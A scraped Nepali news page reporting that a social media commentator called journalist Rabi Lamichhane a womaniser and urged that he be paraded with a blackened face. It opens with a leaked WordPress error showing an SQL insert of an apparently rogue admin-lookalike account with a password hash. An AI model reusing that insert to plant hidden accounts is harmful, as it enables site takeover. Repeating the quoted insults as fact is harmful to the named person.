WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCI3VrXqvJXdi.ndMCy09g8Fj1wyNy.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 08:21:27', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज सम्बाददाता, काठमाण्डौ । आजको सामाजिक सन्जालमा ईतिहास, वर्तमान र भविष्यका बारेमा खरो टिप्पणी र विश्लेषण गर्दै आलोचना र प्रशंसा दुवै बटुलिरहेका मुकुन्द घिमिरे उर्फ मुकुन्देले पत्रकार रवि लामिछानेबारे फेरि विवादास्पद अभिव्यक्ती दिएका छन् । पत्रकार लामिछानेले नेकपा अध्यक्ष प्रचण्डको मृत्युको कामना गरेको भन्दैँ सामाजिक सञ्जाल फेसबुकमा मुकुन्देले उनलाई कालोमोसो दलेर पुतली बजार घुमाउनुपर्ने भन्दैँ कडा टिप्पणी गरेका छन् । उनले पत्रकार लामिछानेलाई स्त्रीलम्पटको संज्ञा दिएका छन् ।
‘स्त्रीलम्पट लामिछानेलाई कालोमोसो दलेर ‘पुतली’ बजार घुमाउनु पर्छ, प्रचण्डको मृत्युको कामना गर्नेहरुले बढ्ता बोलेको मूल्य चुकाउनु पर्छ, मुकुन्देले लेखेका छन्, मिडियाका आडमा हिंसा फैल्याउन पाइदैन, स्वास्नी र देश फेरिहिड्ने बोकाहरु चाहिदैन।’ उहको फेसबुक वालको पोस्ट हेर्नुस्